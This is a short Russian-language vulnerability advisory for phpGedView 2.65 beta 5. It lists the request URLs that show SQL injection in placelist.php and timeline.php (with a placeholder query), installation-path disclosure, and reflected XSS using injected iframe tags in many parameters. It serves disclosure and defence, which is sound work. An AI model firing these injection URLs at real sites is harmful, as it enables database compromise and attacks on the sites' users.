Программа: phpGedView 2.65 beta 5 

Несколько уязвимостей обнаружено в phpGedView. Удаленный пользователь может внедрить SQL команды, выполнить XSS нападение, вызвать отказ в обслуживании и определить инсталляционный путь. 

Сценарии the timeline.php и placelist.php не фильтруют данные в переменных $parent_id и $level. В результате удаленный пользователь может внедрить произвольные SQL команды: 

/placelist.php?level=1[Evil_Query]
/placelist.php?level=1&parent[0]=[Evil_ Query]
/placelist.php?level=2&parent[0]=&parent[1]=[Evil_Query]
/timeline.php?pids=[Evil_Query]

Удаленный пользователь может определить инсталляционный путь, используя следующие типы URl: 

/indilist.php?alpha=\&surname_sublist=\
/famlist.php?alpha=(&surname_sublist= yes&surname=\
/placelist.php?level=1&parent[Blah]=
/imageview.php?zoomval=blah
/imageview.php?filename=/
/timeline.php?pids[Blah]=
/clippings.php?action=add&id=Blah

/login.php?action=login
/login.php?&changelanguage=yes&NEWLANGUAGE=Blah
/gdbi.php?action=connect&username=Blah

Также сообщается, что удаленный пользователь может выполнить XSS нападение: 

/descendancy.php?pid=<iframe>
/index.php?rootid="><iframe>
/individual. php?pid="><iframe>
/login.php?url=/index.php?GEDCOM="><iframe>
/relationship.php?path_to_find="><iframe>
/relationship.php?path_to_find=0&pid1="><iframe>
/relationshi p.php?path_to_find=0&pid1=&pid2="><iframe>
/source.php?sid=<iframe>
/imageview.php?filename=<iframe>
/calendar.php?action=today&day=1&month=jan&year="><iframe>
/calen dar.php?action=today&day=1&month=<iframe>
/calendar.php?action=today&day=<iframe>
/gedrecord.php?pid=<iframe>
/login.php?action=login&username="><iframe>
/login.php?& changelanguage=yes&NEWLANGUAGE=<iframe>
/gdbi_interface.php?action=delete&pid=<iframe>

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии